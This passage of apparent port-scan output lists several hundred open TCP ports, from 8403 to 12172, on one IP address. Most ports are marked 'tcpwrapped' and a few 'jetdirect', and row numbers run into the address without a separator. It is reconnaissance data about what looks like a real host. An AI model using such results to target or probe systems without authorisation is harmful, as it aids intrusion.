9839149.126.72.220 8403 tcp tcpwrapped open
9840149.126.72.220 8404 tcp tcpwrapped open
9841149.126.72.220 8405 tcp tcpwrapped open
9842149.126.72.220 8406 tcp tcpwrapped open
9843149.126.72.220 8407 tcp tcpwrapped open
9844149.126.72.220 8408 tcp tcpwrapped open
9845149.126.72.220 8409 tcp tcpwrapped open
9846149.126.72.220 8410 tcp tcpwrapped open
9847149.126.72.220 8411 tcp tcpwrapped open
9848149.126.72.220 8412 tcp tcpwrapped open
9849149.126.72.220 8413 tcp tcpwrapped open
9850149.126.72.220 8414 tcp tcpwrapped open
9851149.126.72.220 8415 tcp tcpwrapped open
9852149.126.72.220 8416 tcp tcpwrapped open
9853149.126.72.220 8417 tcp tcpwrapped open
9854149.126.72.220 8418 tcp tcpwrapped open
9855149.126.72.220 8419 tcp tcpwrapped open
9856149.126.72.220 8420 tcp tcpwrapped open
9857149.126.72.220 8421 tcp tcpwrapped open
9858149.126.72.220 8422 tcp tcpwrapped open
9859149.126.72.220 8423 tcp tcpwrapped open
9860149.126.72.220 8424 tcp tcpwrapped open
9861149.126.72.220 8425 tcp tcpwrapped open
9862149.126.72.220 8426 tcp tcpwrapped open
9863149.126.72.220 8427 tcp tcpwrapped open
9864149.126.72.220 8428 tcp tcpwrapped open
9865149.126.72.220 8429 tcp tcpwrapped open
9866149.126.72.220 8430 tcp tcpwrapped open
9867149.126.72.220 8431 tcp tcpwrapped open
9868149.126.72.220 8432 tcp tcpwrapped open
9869149.126.72.220 8433 tcp tcpwrapped open
9870149.126.72.220 8435 tcp tcpwrapped open
9871149.126.72.220 8440 tcp tcpwrapped open
9872149.126.72.220 8441 tcp tcpwrapped open
9873149.126.72.220 8442 tcp tcpwrapped open
9874149.126.72.220 8443 tcp tcpwrapped open
9875149.126.72.220 8444 tcp tcpwrapped open
9876149.126.72.220 8445 tcp tcpwrapped open
9877149.126.72.220 8446 tcp tcpwrapped open
9878149.126.72.220 8447 tcp tcpwrapped open
9879149.126.72.220 8448 tcp tcpwrapped open
9880149.126.72.220 8449 tcp tcpwrapped open
9881149.126.72.220 8450 tcp tcpwrapped open
9882149.126.72.220 8451 tcp tcpwrapped open
9883149.126.72.220 8452 tcp tcpwrapped open
9884149.126.72.220 8453 tcp tcpwrapped open
9885149.126.72.220 8454 tcp tcpwrapped open
9886149.126.72.220 8455 tcp tcpwrapped open
9887149.126.72.220 8456 tcp tcpwrapped open
9888149.126.72.220 8457 tcp tcpwrapped open
9889149.126.72.220 8458 tcp tcpwrapped open
9890149.126.72.220 8459 tcp tcpwrapped open
9891149.126.72.220 8460 tcp tcpwrapped open
9892149.126.72.220 8461 tcp tcpwrapped open
9893149.126.72.220 8462 tcp tcpwrapped open
9894149.126.72.220 8463 tcp tcpwrapped open
9895149.126.72.220 8464 tcp tcpwrapped open
9896149.126.72.220 8465 tcp tcpwrapped open
9897149.126.72.220 8466 tcp tcpwrapped open
9898149.126.72.220 8467 tcp tcpwrapped open
9899149.126.72.220 8470 tcp tcpwrapped open
9900149.126.72.220 8472 tcp tcpwrapped open
9901149.126.72.220 8473 tcp tcpwrapped open
9902149.126.72.220 8475 tcp tcpwrapped open
9903149.126.72.220 8480 tcp tcpwrapped open
9904149.126.72.220 8481 tcp tcpwrapped open
9905149.126.72.220 8482 tcp tcpwrapped open
9906149.126.72.220 8484 tcp tcpwrapped open
9907149.126.72.220 8485 tcp tcpwrapped open
9908149.126.72.220 8488 tcp tcpwrapped open
9909149.126.72.220 8493 tcp tcpwrapped open
9910149.126.72.220 8494 tcp tcpwrapped open
9911149.126.72.220 8500 tcp tcpwrapped open
9912149.126.72.220 8502 tcp tcpwrapped open
9913149.126.72.220 8503 tcp tcpwrapped open
9914149.126.72.220 8504 tcp tcpwrapped open
9915149.126.72.220 8505 tcp tcpwrapped open
9916149.126.72.220 8506 tcp tcpwrapped open
9917149.126.72.220 8510 tcp tcpwrapped open
9918149.126.72.220 8513 tcp tcpwrapped open
9919149.126.72.220 8514 tcp tcpwrapped open
9920149.126.72.220 8515 tcp tcpwrapped open
9921149.126.72.220 8519 tcp tcpwrapped open
9922149.126.72.220 8520 tcp tcpwrapped open
9923149.126.72.220 8521 tcp tcpwrapped open
9924149.126.72.220 8523 tcp tcpwrapped open
9925149.126.72.220 8524 tcp tcpwrapped open
9926149.126.72.220 8525 tcp tcpwrapped open
9927149.126.72.220 8526 tcp tcpwrapped open
9928149.126.72.220 8528 tcp tcpwrapped open
9929149.126.72.220 8529 tcp tcpwrapped open
9930149.126.72.220 8530 tcp tcpwrapped open
9931149.126.72.220 8531 tcp tcpwrapped open
9932149.126.72.220 8532 tcp tcpwrapped open
9933149.126.72.220 8533 tcp tcpwrapped open
9934149.126.72.220 8536 tcp tcpwrapped open
9935149.126.72.220 8540 tcp tcpwrapped open
9936149.126.72.220 8543 tcp tcpwrapped open
9937149.126.72.220 8544 tcp tcpwrapped open
9938149.126.72.220 8548 tcp tcpwrapped open
9939149.126.72.220 8549 tcp tcpwrapped open
9940149.126.72.220 8550 tcp tcpwrapped open
9941149.126.72.220 8551 tcp tcpwrapped open
9942149.126.72.220 8553 tcp tcpwrapped open
9943149.126.72.220 8556 tcp tcpwrapped open
9944149.126.72.220 8557 tcp tcpwrapped open
9945149.126.72.220 8558 tcp tcpwrapped open
9946149.126.72.220 8560 tcp tcpwrapped open
9947149.126.72.220 8561 tcp tcpwrapped open
9948149.126.72.220 8562 tcp tcpwrapped open
9949149.126.72.220 8563 tcp tcpwrapped open
9950149.126.72.220 8564 tcp tcpwrapped open
9951149.126.72.220 8565 tcp tcpwrapped open
9952149.126.72.220 8566 tcp tcpwrapped open
9953149.126.72.220 8567 tcp tcpwrapped open
9954149.126.72.220 8568 tcp tcpwrapped open
9955149.126.72.220 8569 tcp tcpwrapped open
9956149.126.72.220 8570 tcp tcpwrapped open
9957149.126.72.220 8571 tcp tcpwrapped open
9958149.126.72.220 8573 tcp tcpwrapped open
9959149.126.72.220 8574 tcp tcpwrapped open
9960149.126.72.220 8575 tcp tcpwrapped open
9961149.126.72.220 8576 tcp tcpwrapped open
9962149.126.72.220 8577 tcp tcpwrapped open
9963149.126.72.220 8578 tcp tcpwrapped open
9964149.126.72.220 8579 tcp tcpwrapped open
9965149.126.72.220 8580 tcp tcpwrapped open
9966149.126.72.220 8581 tcp tcpwrapped open
9967149.126.72.220 8582 tcp tcpwrapped open
9968149.126.72.220 8583 tcp tcpwrapped open
9969149.126.72.220 8585 tcp tcpwrapped open
9970149.126.72.220 8586 tcp tcpwrapped open
9971149.126.72.220 8588 tcp tcpwrapped open
9972149.126.72.220 8589 tcp tcpwrapped open
9973149.126.72.220 8590 tcp tcpwrapped open
9974149.126.72.220 8591 tcp tcpwrapped open
9975149.126.72.220 8592 tcp tcpwrapped open
9976149.126.72.220 8593 tcp tcpwrapped open
9977149.126.72.220 8594 tcp tcpwrapped open
9978149.126.72.220 8595 tcp tcpwrapped open
9979149.126.72.220 8596 tcp tcpwrapped open
9980149.126.72.220 8597 tcp tcpwrapped open
9981149.126.72.220 8598 tcp tcpwrapped open
9982149.126.72.220 8599 tcp tcpwrapped open
9983149.126.72.220 8600 tcp tcpwrapped open
9984149.126.72.220 8601 tcp tcpwrapped open
9985149.126.72.220 8605 tcp tcpwrapped open
9986149.126.72.220 8606 tcp tcpwrapped open
9987149.126.72.220 8630 tcp tcpwrapped open
9988149.126.72.220 8640 tcp tcpwrapped open
9989149.126.72.220 8641 tcp tcpwrapped open
9990149.126.72.220 8643 tcp tcpwrapped open
9991149.126.72.220 8663 tcp tcpwrapped open
9992149.126.72.220 8666 tcp tcpwrapped open
9993149.126.72.220 8686 tcp tcpwrapped open
9994149.126.72.220 8688 tcp tcpwrapped open
9995149.126.72.220 8700 tcp tcpwrapped open
9996149.126.72.220 8701 tcp tcpwrapped open
9997149.126.72.220 8702 tcp tcpwrapped open
9998149.126.72.220 8703 tcp tcpwrapped open
9999149.126.72.220 8704 tcp tcpwrapped open
10000149.126.72.220 8705 tcp tcpwrapped open
10001149.126.72.220 8706 tcp tcpwrapped open
10002149.126.72.220 8707 tcp tcpwrapped open
10003149.126.72.220 8708 tcp tcpwrapped open
10004149.126.72.220 8709 tcp tcpwrapped open
10005149.126.72.220 8723 tcp tcpwrapped open
10006149.126.72.220 8724 tcp tcpwrapped open
10007149.126.72.220 8731 tcp tcpwrapped open
10008149.126.72.220 8732 tcp tcpwrapped open
10009149.126.72.220 8764 tcp tcpwrapped open
10010149.126.72.220 8765 tcp tcpwrapped open
10011149.126.72.220 8766 tcp tcpwrapped open
10012149.126.72.220 8767 tcp tcpwrapped open
10013149.126.72.220 8771 tcp tcpwrapped open
10014149.126.72.220 8787 tcp tcpwrapped open
10015149.126.72.220 8788 tcp tcpwrapped open
10016149.126.72.220 8789 tcp tcpwrapped open
10017149.126.72.220 8790 tcp tcpwrapped open
10018149.126.72.220 8791 tcp tcpwrapped open
10019149.126.72.220 8800 tcp tcpwrapped open
10020149.126.72.220 8801 tcp tcpwrapped open
10021149.126.72.220 8802 tcp tcpwrapped open
10022149.126.72.220 8803 tcp tcpwrapped open
10023149.126.72.220 8804 tcp tcpwrapped open
10024149.126.72.220 8805 tcp tcpwrapped open
10025149.126.72.220 8806 tcp tcpwrapped open
10026149.126.72.220 8807 tcp tcpwrapped open
10027149.126.72.220 8808 tcp tcpwrapped open
10028149.126.72.220 8809 tcp tcpwrapped open
10029149.126.72.220 8810 tcp tcpwrapped open
10030149.126.72.220 8811 tcp tcpwrapped open
10031149.126.72.220 8812 tcp tcpwrapped open
10032149.126.72.220 8813 tcp tcpwrapped open
10033149.126.72.220 8814 tcp tcpwrapped open
10034149.126.72.220 8815 tcp tcpwrapped open
10035149.126.72.220 8816 tcp tcpwrapped open
10036149.126.72.220 8817 tcp tcpwrapped open
10037149.126.72.220 8818 tcp tcpwrapped open
10038149.126.72.220 8819 tcp tcpwrapped open
10039149.126.72.220 8820 tcp tcpwrapped open
10040149.126.72.220 8821 tcp tcpwrapped open
10041149.126.72.220 8822 tcp tcpwrapped open
10042149.126.72.220 8823 tcp tcpwrapped open
10043149.126.72.220 8824 tcp tcpwrapped open
10044149.126.72.220 8825 tcp tcpwrapped open
10045149.126.72.220 8826 tcp tcpwrapped open
10046149.126.72.220 8827 tcp tcpwrapped open
10047149.126.72.220 8828 tcp tcpwrapped open
10048149.126.72.220 8829 tcp tcpwrapped open
10049149.126.72.220 8830 tcp tcpwrapped open
10050149.126.72.220 8831 tcp tcpwrapped open
10051149.126.72.220 8832 tcp tcpwrapped open
10052149.126.72.220 8833 tcp tcpwrapped open
10053149.126.72.220 8834 tcp tcpwrapped open
10054149.126.72.220 8835 tcp tcpwrapped open
10055149.126.72.220 8836 tcp tcpwrapped open
10056149.126.72.220 8837 tcp tcpwrapped open
10057149.126.72.220 8838 tcp tcpwrapped open
10058149.126.72.220 8839 tcp tcpwrapped open
10059149.126.72.220 8840 tcp tcpwrapped open
10060149.126.72.220 8841 tcp tcpwrapped open
10061149.126.72.220 8842 tcp tcpwrapped open
10062149.126.72.220 8843 tcp tcpwrapped open
10063149.126.72.220 8844 tcp tcpwrapped open
10064149.126.72.220 8845 tcp tcpwrapped open
10065149.126.72.220 8846 tcp tcpwrapped open
10066149.126.72.220 8847 tcp tcpwrapped open
10067149.126.72.220 8848 tcp tcpwrapped open
10068149.126.72.220 8849 tcp tcpwrapped open
10069149.126.72.220 8850 tcp tcpwrapped open
10070149.126.72.220 8851 tcp tcpwrapped open
10071149.126.72.220 8852 tcp tcpwrapped open
10072149.126.72.220 8853 tcp tcpwrapped open
10073149.126.72.220 8854 tcp tcpwrapped open
10074149.126.72.220 8855 tcp tcpwrapped open
10075149.126.72.220 8856 tcp tcpwrapped open
10076149.126.72.220 8857 tcp tcpwrapped open
10077149.126.72.220 8858 tcp tcpwrapped open
10078149.126.72.220 8859 tcp tcpwrapped open
10079149.126.72.220 8860 tcp tcpwrapped open
10080149.126.72.220 8861 tcp tcpwrapped open
10081149.126.72.220 8862 tcp tcpwrapped open
10082149.126.72.220 8863 tcp tcpwrapped open
10083149.126.72.220 8864 tcp tcpwrapped open
10084149.126.72.220 8865 tcp tcpwrapped open
10085149.126.72.220 8866 tcp tcpwrapped open
10086149.126.72.220 8867 tcp tcpwrapped open
10087149.126.72.220 8868 tcp tcpwrapped open
10088149.126.72.220 8869 tcp tcpwrapped open
10089149.126.72.220 8870 tcp tcpwrapped open
10090149.126.72.220 8871 tcp tcpwrapped open
10091149.126.72.220 8872 tcp tcpwrapped open
10092149.126.72.220 8873 tcp tcpwrapped open
10093149.126.72.220 8874 tcp tcpwrapped open
10094149.126.72.220 8875 tcp tcpwrapped open
10095149.126.72.220 8876 tcp tcpwrapped open
10096149.126.72.220 8877 tcp tcpwrapped open
10097149.126.72.220 8878 tcp tcpwrapped open
10098149.126.72.220 8879 tcp tcpwrapped open
10099149.126.72.220 8880 tcp tcpwrapped open
10100149.126.72.220 8881 tcp tcpwrapped open
10101149.126.72.220 8882 tcp tcpwrapped open
10102149.126.72.220 8883 tcp tcpwrapped open
10103149.126.72.220 8884 tcp tcpwrapped open
10104149.126.72.220 8885 tcp tcpwrapped open
10105149.126.72.220 8887 tcp tcpwrapped open
10106149.126.72.220 8888 tcp tcpwrapped open
10107149.126.72.220 8889 tcp tcpwrapped open
10108149.126.72.220 8890 tcp tcpwrapped open
10109149.126.72.220 8891 tcp tcpwrapped open
10110149.126.72.220 8899 tcp tcpwrapped open
10111149.126.72.220 8900 tcp tcpwrapped open
10112149.126.72.220 8901 tcp tcpwrapped open
10113149.126.72.220 8902 tcp tcpwrapped open
10114149.126.72.220 8905 tcp tcpwrapped open
10115149.126.72.220 8906 tcp tcpwrapped open
10116149.126.72.220 8907 tcp tcpwrapped open
10117149.126.72.220 8908 tcp tcpwrapped open
10118149.126.72.220 8910 tcp tcpwrapped open
10119149.126.72.220 8911 tcp tcpwrapped open
10120149.126.72.220 8912 tcp tcpwrapped open
10121149.126.72.220 8913 tcp tcpwrapped open
10122149.126.72.220 8915 tcp tcpwrapped open
10123149.126.72.220 8916 tcp tcpwrapped open
10124149.126.72.220 8935 tcp tcpwrapped open
10125149.126.72.220 8943 tcp tcpwrapped open
10126149.126.72.220 8969 tcp tcpwrapped open
10127149.126.72.220 8988 tcp tcpwrapped open
10128149.126.72.220 8989 tcp tcpwrapped open
10129149.126.72.220 8999 tcp tcpwrapped open
10130149.126.72.220 9000 tcp tcpwrapped open
10131149.126.72.220 9001 tcp tcpwrapped open
10132149.126.72.220 9002 tcp tcpwrapped open
10133149.126.72.220 9003 tcp tcpwrapped open
10134149.126.72.220 9004 tcp tcpwrapped open
10135149.126.72.220 9005 tcp tcpwrapped open
10136149.126.72.220 9006 tcp tcpwrapped open
10137149.126.72.220 9007 tcp tcpwrapped open
10138149.126.72.220 9008 tcp tcpwrapped open
10139149.126.72.220 9009 tcp tcpwrapped open
10140149.126.72.220 9010 tcp tcpwrapped open
10141149.126.72.220 9011 tcp tcpwrapped open
10142149.126.72.220 9012 tcp tcpwrapped open
10143149.126.72.220 9013 tcp tcpwrapped open
10144149.126.72.220 9014 tcp tcpwrapped open
10145149.126.72.220 9015 tcp tcpwrapped open
10146149.126.72.220 9016 tcp tcpwrapped open
10147149.126.72.220 9017 tcp tcpwrapped open
10148149.126.72.220 9018 tcp tcpwrapped open
10149149.126.72.220 9019 tcp tcpwrapped open
10150149.126.72.220 9020 tcp tcpwrapped open
10151149.126.72.220 9021 tcp tcpwrapped open
10152149.126.72.220 9022 tcp tcpwrapped open
10153149.126.72.220 9023 tcp tcpwrapped open
10154149.126.72.220 9024 tcp tcpwrapped open
10155149.126.72.220 9025 tcp tcpwrapped open
10156149.126.72.220 9026 tcp tcpwrapped open
10157149.126.72.220 9027 tcp tcpwrapped open
10158149.126.72.220 9028 tcp tcpwrapped open
10159149.126.72.220 9029 tcp tcpwrapped open
10160149.126.72.220 9030 tcp tcpwrapped open
10161149.126.72.220 9031 tcp tcpwrapped open
10162149.126.72.220 9032 tcp tcpwrapped open
10163149.126.72.220 9033 tcp tcpwrapped open
10164149.126.72.220 9034 tcp tcpwrapped open
10165149.126.72.220 9035 tcp tcpwrapped open
10166149.126.72.220 9036 tcp tcpwrapped open
10167149.126.72.220 9037 tcp tcpwrapped open
10168149.126.72.220 9038 tcp tcpwrapped open
10169149.126.72.220 9039 tcp tcpwrapped open
10170149.126.72.220 9040 tcp tcpwrapped open
10171149.126.72.220 9041 tcp tcpwrapped open
10172149.126.72.220 9042 tcp tcpwrapped open
10173149.126.72.220 9043 tcp tcpwrapped open
10174149.126.72.220 9044 tcp tcpwrapped open
10175149.126.72.220 9045 tcp tcpwrapped open
10176149.126.72.220 9046 tcp tcpwrapped open
10177149.126.72.220 9047 tcp tcpwrapped open
10178149.126.72.220 9048 tcp tcpwrapped open
10179149.126.72.220 9049 tcp tcpwrapped open
10180149.126.72.220 9050 tcp tcpwrapped open
10181149.126.72.220 9051 tcp tcpwrapped open
10182149.126.72.220 9052 tcp tcpwrapped open
10183149.126.72.220 9058 tcp tcpwrapped open
10184149.126.72.220 9060 tcp tcpwrapped open
10185149.126.72.220 9061 tcp tcpwrapped open
10186149.126.72.220 9070 tcp tcpwrapped open
10187149.126.72.220 9080 tcp tcpwrapped open
10188149.126.72.220 9081 tcp tcpwrapped open
10189149.126.72.220 9082 tcp tcpwrapped open
10190149.126.72.220 9084 tcp tcpwrapped open
10191149.126.72.220 9085 tcp tcpwrapped open
10192149.126.72.220 9086 tcp tcpwrapped open
10193149.126.72.220 9088 tcp tcpwrapped open
10194149.126.72.220 9089 tcp tcpwrapped open
10195149.126.72.220 9090 tcp tcpwrapped open
10196149.126.72.220 9091 tcp tcpwrapped open
10197149.126.72.220 9092 tcp tcpwrapped open
10198149.126.72.220 9093 tcp tcpwrapped open
10199149.126.72.220 9094 tcp tcpwrapped open
10200149.126.72.220 9095 tcp tcpwrapped open
10201149.126.72.220 9096 tcp tcpwrapped open
10202149.126.72.220 9097 tcp tcpwrapped open
10203149.126.72.220 9098 tcp tcpwrapped open
10204149.126.72.220 9099 tcp tcpwrapped open
10205149.126.72.220 9100 tcp jetdirect open
10206149.126.72.220 9101 tcp jetdirect open
10207149.126.72.220 9102 tcp jetdirect open
10208149.126.72.220 9103 tcp jetdirect open
10209149.126.72.220 9104 tcp jetdirect open
10210149.126.72.220 9105 tcp jetdirect open
10211149.126.72.220 9106 tcp jetdirect open
10212149.126.72.220 9107 tcp jetdirect open
10213149.126.72.220 9108 tcp tcpwrapped open
10214149.126.72.220 9109 tcp tcpwrapped open
10215149.126.72.220 9110 tcp tcpwrapped open
10216149.126.72.220 9111 tcp tcpwrapped open
10217149.126.72.220 9136 tcp tcpwrapped open
10218149.126.72.220 9143 tcp tcpwrapped open
10219149.126.72.220 9189 tcp tcpwrapped open
10220149.126.72.220 9199 tcp tcpwrapped open
10221149.126.72.220 9200 tcp tcpwrapped open
10222149.126.72.220 9201 tcp tcpwrapped open
10223149.126.72.220 9202 tcp tcpwrapped open
10224149.126.72.220 9203 tcp tcpwrapped open
10225149.126.72.220 9204 tcp tcpwrapped open
10226149.126.72.220 9205 tcp tcpwrapped open
10227149.126.72.220 9206 tcp tcpwrapped open
10228149.126.72.220 9207 tcp tcpwrapped open
10229149.126.72.220 9208 tcp tcpwrapped open
10230149.126.72.220 9209 tcp tcpwrapped open
10231149.126.72.220 9210 tcp tcpwrapped open
10232149.126.72.220 9211 tcp tcpwrapped open
10233149.126.72.220 9212 tcp tcpwrapped open
10234149.126.72.220 9213 tcp tcpwrapped open
10235149.126.72.220 9214 tcp tcpwrapped open
10236149.126.72.220 9215 tcp tcpwrapped open
10237149.126.72.220 9216 tcp tcpwrapped open
10238149.126.72.220 9217 tcp tcpwrapped open
10239149.126.72.220 9218 tcp tcpwrapped open
10240149.126.72.220 9219 tcp tcpwrapped open
10241149.126.72.220 9220 tcp tcpwrapped open
10242149.126.72.220 9221 tcp tcpwrapped open
10243149.126.72.220 9236 tcp tcpwrapped open
10244149.126.72.220 9251 tcp tcpwrapped open
10245149.126.72.220 9289 tcp tcpwrapped open
10246149.126.72.220 9299 tcp tcpwrapped open
10247149.126.72.220 9300 tcp tcpwrapped open
10248149.126.72.220 9301 tcp tcpwrapped open
10249149.126.72.220 9302 tcp tcpwrapped open
10250149.126.72.220 9303 tcp tcpwrapped open
10251149.126.72.220 9304 tcp tcpwrapped open
10252149.126.72.220 9305 tcp tcpwrapped open
10253149.126.72.220 9306 tcp tcpwrapped open
10254149.126.72.220 9307 tcp tcpwrapped open
10255149.126.72.220 9308 tcp tcpwrapped open
10256149.126.72.220 9309 tcp tcpwrapped open
10257149.126.72.220 9310 tcp tcpwrapped open
10258149.126.72.220 9311 tcp tcpwrapped open
10259149.126.72.220 9350 tcp tcpwrapped open
10260149.126.72.220 9383 tcp tcpwrapped open
10261149.126.72.220 9387 tcp tcpwrapped open
10262149.126.72.220 9389 tcp tcpwrapped open
10263149.126.72.220 9433 tcp tcpwrapped open
10264149.126.72.220 9443 tcp tcpwrapped open
10265149.126.72.220 9444 tcp tcpwrapped open
10266149.126.72.220 9446 tcp tcpwrapped open
10267149.126.72.220 9447 tcp tcpwrapped open
10268149.126.72.220 9500 tcp tcpwrapped open
10269149.126.72.220 9510 tcp tcpwrapped open
10270149.126.72.220 9530 tcp tcpwrapped open
10271149.126.72.220 9550 tcp tcpwrapped open
10272149.126.72.220 9600 tcp tcpwrapped open
10273149.126.72.220 9663 tcp tcpwrapped open
10274149.126.72.220 9690 tcp tcpwrapped open
10275149.126.72.220 9704 tcp tcpwrapped open
10276149.126.72.220 9710 tcp tcpwrapped open
10277149.126.72.220 9711 tcp tcpwrapped open
10278149.126.72.220 9765 tcp tcpwrapped open
10279149.126.72.220 9773 tcp tcpwrapped open
10280149.126.72.220 9779 tcp tcpwrapped open
10281149.126.72.220 9800 tcp tcpwrapped open
10282149.126.72.220 9803 tcp tcpwrapped open
10283149.126.72.220 9804 tcp tcpwrapped open
10284149.126.72.220 9950 tcp tcpwrapped open
10285149.126.72.220 9991 tcp tcpwrapped open
10286149.126.72.220 9992 tcp tcpwrapped open
10287149.126.72.220 9993 tcp tcpwrapped open
10288149.126.72.220 9994 tcp tcpwrapped open
10289149.126.72.220 9997 tcp tcpwrapped open
10290149.126.72.220 9998 tcp tcpwrapped open
10291149.126.72.220 9999 tcp tcpwrapped open
10292149.126.72.220 10000 tcp tcpwrapped open
10293149.126.72.220 10001 tcp tcpwrapped open
10294149.126.72.220 10002 tcp tcpwrapped open
10295149.126.72.220 10003 tcp tcpwrapped open
10296149.126.72.220 10004 tcp tcpwrapped open
10297149.126.72.220 10005 tcp tcpwrapped open
10298149.126.72.220 10006 tcp tcpwrapped open
10299149.126.72.220 10007 tcp tcpwrapped open
10300149.126.72.220 10008 tcp tcpwrapped open
10301149.126.72.220 10009 tcp tcpwrapped open
10302149.126.72.220 10010 tcp tcpwrapped open
10303149.126.72.220 10011 tcp tcpwrapped open
10304149.126.72.220 10012 tcp tcpwrapped open
10305149.126.72.220 10013 tcp tcpwrapped open
10306149.126.72.220 10014 tcp tcpwrapped open
10307149.126.72.220 10015 tcp tcpwrapped open
10308149.126.72.220 10016 tcp tcpwrapped open
10309149.126.72.220 10017 tcp tcpwrapped open
10310149.126.72.220 10018 tcp tcpwrapped open
10311149.126.72.220 10019 tcp tcpwrapped open
10312149.126.72.220 10020 tcp tcpwrapped open
10313149.126.72.220 10021 tcp tcpwrapped open
10314149.126.72.220 10022 tcp tcpwrapped open
10315149.126.72.220 10023 tcp tcpwrapped open
10316149.126.72.220 10024 tcp tcpwrapped open
10317149.126.72.220 10025 tcp tcpwrapped open
10318149.126.72.220 10026 tcp tcpwrapped open
10319149.126.72.220 10027 tcp tcpwrapped open
10320149.126.72.220 10028 tcp tcpwrapped open
10321149.126.72.220 10029 tcp tcpwrapped open
10322149.126.72.220 10030 tcp tcpwrapped open
10323149.126.72.220 10031 tcp tcpwrapped open
10324149.126.72.220 10032 tcp tcpwrapped open
10325149.126.72.220 10033 tcp tcpwrapped open
10326149.126.72.220 10034 tcp tcpwrapped open
10327149.126.72.220 10035 tcp tcpwrapped open
10328149.126.72.220 10036 tcp tcpwrapped open
10329149.126.72.220 10037 tcp tcpwrapped open
10330149.126.72.220 10038 tcp tcpwrapped open
10331149.126.72.220 10039 tcp tcpwrapped open
10332149.126.72.220 10040 tcp tcpwrapped open
10333149.126.72.220 10041 tcp tcpwrapped open
10334149.126.72.220 10042 tcp tcpwrapped open
10335149.126.72.220 10043 tcp tcpwrapped open
10336149.126.72.220 10044 tcp tcpwrapped open
10337149.126.72.220 10045 tcp tcpwrapped open
10338149.126.72.220 10046 tcp tcpwrapped open
10339149.126.72.220 10047 tcp tcpwrapped open
10340149.126.72.220 10048 tcp tcpwrapped open
10341149.126.72.220 10049 tcp tcpwrapped open
10342149.126.72.220 10065 tcp tcpwrapped open
10343149.126.72.220 10071 tcp tcpwrapped open
10344149.126.72.220 10075 tcp tcpwrapped open
10345149.126.72.220 10082 tcp tcpwrapped open
10346149.126.72.220 10084 tcp tcpwrapped open
10347149.126.72.220 10100 tcp tcpwrapped open
10348149.126.72.220 10123 tcp tcpwrapped open
10349149.126.72.220 10200 tcp tcpwrapped open
10350149.126.72.220 10443 tcp tcpwrapped open
10351149.126.72.220 10444 tcp tcpwrapped open
10352149.126.72.220 10892 tcp tcpwrapped open
10353149.126.72.220 10894 tcp tcpwrapped open
10354149.126.72.220 11001 tcp tcpwrapped open
10355149.126.72.220 11002 tcp tcpwrapped open
10356149.126.72.220 11007 tcp tcpwrapped open
10357149.126.72.220 11027 tcp tcpwrapped open
10358149.126.72.220 11065 tcp tcpwrapped open
10359149.126.72.220 11075 tcp tcpwrapped open
10360149.126.72.220 11082 tcp tcpwrapped open
10361149.126.72.220 11084 tcp tcpwrapped open
10362149.126.72.220 11110 tcp tcpwrapped open
10363149.126.72.220 11182 tcp tcpwrapped open
10364149.126.72.220 11184 tcp tcpwrapped open
10365149.126.72.220 11443 tcp tcpwrapped open
10366149.126.72.220 12016 tcp tcpwrapped open
10367149.126.72.220 12082 tcp tcpwrapped open
10368149.126.72.220 12084 tcp tcpwrapped open
10369149.126.72.220 12103 tcp tcpwrapped open
10370149.126.72.220 12104 tcp tcpwrapped open
10371149.126.72.220 12105 tcp tcpwrapped open
10372149.126.72.220 12106 tcp tcpwrapped open
10373149.126.72.220 12107 tcp tcpwrapped open
10374149.126.72.220 12108 tcp tcpwrapped open
10375149.126.72.220 12109 tcp tcpwrapped open
10376149.126.72.220 12110 tcp tcpwrapped open
10377149.126.72.220 12111 tcp tcpwrapped open
10378149.126.72.220 12112 tcp tcpwrapped open
10379149.126.72.220 12113 tcp tcpwrapped open
10380149.126.72.220 12114 tcp tcpwrapped open
10381149.126.72.220 12115 tcp tcpwrapped open
10382149.126.72.220 12116 tcp tcpwrapped open
10383149.126.72.220 12117 tcp tcpwrapped open
10384149.126.72.220 12118 tcp tcpwrapped open
10385149.126.72.220 12119 tcp tcpwrapped open
10386149.126.72.220 12120 tcp tcpwrapped open
10387149.126.72.220 12121 tcp tcpwrapped open
10388149.126.72.220 12122 tcp tcpwrapped open
10389149.126.72.220 12123 tcp tcpwrapped open
10390149.126.72.220 12124 tcp tcpwrapped open
10391149.126.72.220 12125 tcp tcpwrapped open
10392149.126.72.220 12126 tcp tcpwrapped open
10393149.126.72.220 12127 tcp tcpwrapped open
10394149.126.72.220 12128 tcp tcpwrapped open
10395149.126.72.220 12129 tcp tcpwrapped open
10396149.126.72.220 12130 tcp tcpwrapped open
10397149.126.72.220 12131 tcp tcpwrapped open
10398149.126.72.220 12132 tcp tcpwrapped open
10399149.126.72.220 12133 tcp tcpwrapped open
10400149.126.72.220 12134 tcp tcpwrapped open
10401149.126.72.220 12135 tcp tcpwrapped open
10402149.126.72.220 12136 tcp tcpwrapped open
10403149.126.72.220 12137 tcp tcpwrapped open
10404149.126.72.220 12138 tcp tcpwrapped open
10405149.126.72.220 12139 tcp tcpwrapped open
10406149.126.72.220 12140 tcp tcpwrapped open
10407149.126.72.220 12141 tcp tcpwrapped open
10408149.126.72.220 12142 tcp tcpwrapped open
10409149.126.72.220 12143 tcp tcpwrapped open
10410149.126.72.220 12144 tcp tcpwrapped open
10411149.126.72.220 12145 tcp tcpwrapped open
10412149.126.72.220 12146 tcp tcpwrapped open
10413149.126.72.220 12147 tcp tcpwrapped open
10414149.126.72.220 12148 tcp tcpwrapped open
10415149.126.72.220 12149 tcp tcpwrapped open
10416149.126.72.220 12150 tcp tcpwrapped open
10417149.126.72.220 12151 tcp tcpwrapped open
10418149.126.72.220 12152 tcp tcpwrapped open
10419149.126.72.220 12153 tcp tcpwrapped open
10420149.126.72.220 12154 tcp tcpwrapped open
10421149.126.72.220 12155 tcp tcpwrapped open
10422149.126.72.220 12156 tcp tcpwrapped open
10423149.126.72.220 12157 tcp tcpwrapped open
10424149.126.72.220 12158 tcp tcpwrapped open
10425149.126.72.220 12159 tcp tcpwrapped open
10426149.126.72.220 12160 tcp tcpwrapped open
10427149.126.72.220 12161 tcp tcpwrapped open
10428149.126.72.220 12162 tcp tcpwrapped open
10429149.126.72.220 12163 tcp tcpwrapped open
10430149.126.72.220 12164 tcp tcpwrapped open
10431149.126.72.220 12165 tcp tcpwrapped open
10432149.126.72.220 12166 tcp tcpwrapped open
10433149.126.72.220 12167 tcp tcpwrapped open
10434149.126.72.220 12168 tcp tcpwrapped open
10435149.126.72.220 12169 tcp tcpwrapped open
10436149.126.72.220 12170 tcp tcpwrapped open
10437149.126.72.220 12171 tcp tcpwrapped open
10438149.126.72.220 12172 tcp tcpwrapped open
